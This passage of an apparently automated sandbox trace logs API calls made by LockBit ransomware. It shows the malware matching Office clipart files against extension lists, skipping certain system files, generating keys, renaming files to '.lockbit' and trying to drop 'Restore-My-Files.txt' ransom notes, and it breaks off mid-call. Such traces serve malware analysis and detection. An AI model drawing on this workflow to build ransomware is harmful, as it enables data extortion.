lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.886] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.887] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.887] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.888] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00602_.WMF") returned 1 [0117.888] lstrcmpiW (lpString1="ntldr", lpString2="HH00602_.WMF") returned 1 [0117.888] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00602_.WMF") returned 1 [0117.888] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00602_.WMF") returned -1 [0117.888] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00602_.WMF") returned -1 [0117.888] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00602_.WMF") returned 1 [0117.888] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00602_.WMF") returned 1 [0117.888] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.888] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned=".WMF" [0117.889] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.889] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.889] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.890] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.890] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.890] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.890] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.890] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.890] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.890] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.890] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.890] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF.lockbit") returned 72 [0117.890] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0117.891] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.891] malloc (_Size=0x40068) returned 0x3ef0008 [0117.891] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1400) returned 1 [0117.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0117.892] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0117.892] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.900] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.900] malloc (_Size=0xa6) returned 0x77d7a8 [0117.900] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.901] free (_Block=0x77d7a8) [0117.901] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.901] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.901] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.902] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aad3100, ftCreationTime.dwHighDateTime=0x1bd4b1b, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1aad3100, ftLastWriteTime.dwHighDateTime=0x1bd4b1b, nFileSizeHigh=0x0, nFileSizeLow=0x3158, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00612_.WMF", cAlternateFileName="")) returned 1 [0117.902] lstrcmpiW (lpString1=".", lpString2="HH00612_.WMF") returned -1 [0117.902] lstrcmpiW (lpString1="..", lpString2="HH00612_.WMF") returned -1 [0117.902] PathFindExtensionW (pszPath="HH00612_.WMF") returned=".WMF" [0117.902] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.902] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.903] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.903] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.904] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00612_.WMF") returned 1 [0117.904] lstrcmpiW (lpString1="ntldr", lpString2="HH00612_.WMF") returned 1 [0117.904] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00612_.WMF") returned 1 [0117.904] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00612_.WMF") returned -1 [0117.904] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00612_.WMF") returned -1 [0117.904] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00612_.WMF") returned 1 [0117.904] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00612_.WMF") returned 1 [0117.904] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.904] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned=".WMF" [0117.905] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.905] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.905] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.906] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.906] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.906] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.906] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.906] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.906] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.906] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.906] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.906] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.906] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF.lockbit") returned 72 [0117.906] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0117.911] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.911] malloc (_Size=0x40068) returned 0x1ff1e60 [0117.911] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12632) returned 1 [0117.911] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0117.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0117.913] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.917] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.917] malloc (_Size=0xa6) returned 0x77d7a8 [0117.917] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.918] free (_Block=0x77d7a8) [0117.918] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.918] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.918] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98237200, ftCreationTime.dwHighDateTime=0x1bd4b18, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x98237200, ftLastWriteTime.dwHighDateTime=0x1bd4b18, nFileSizeHigh=0x0, nFileSizeLow=0x2994, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00623_.WMF", cAlternateFileName="")) returned 1 [0117.918] lstrcmpiW (lpString1=".", lpString2="HH00623_.WMF") returned -1 [0117.918] lstrcmpiW (lpString1="..", lpString2="HH00623_.WMF") returned -1 [0117.918] PathFindExtensionW (pszPath="HH00623_.WMF") returned=".WMF" [0117.918] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.919] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.920] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.920] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.921] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00623_.WMF") returned 1 [0117.921] lstrcmpiW (lpString1="ntldr", lpString2="HH00623_.WMF") returned 1 [0117.921] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00623_.WMF") returned 1 [0117.921] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00623_.WMF") returned -1 [0117.921] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00623_.WMF") returned -1 [0117.921] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00623_.WMF") returned 1 [0117.921] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00623_.WMF") returned 1 [0117.921] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.921] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned=".WMF" [0117.922] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.922] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.922] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.923] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.923] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.923] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.923] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.923] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.923] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.923] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.923] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.923] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.923] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF.lockbit") returned 72 [0117.923] CreateFileW (lpFileName="C:\\\\Program 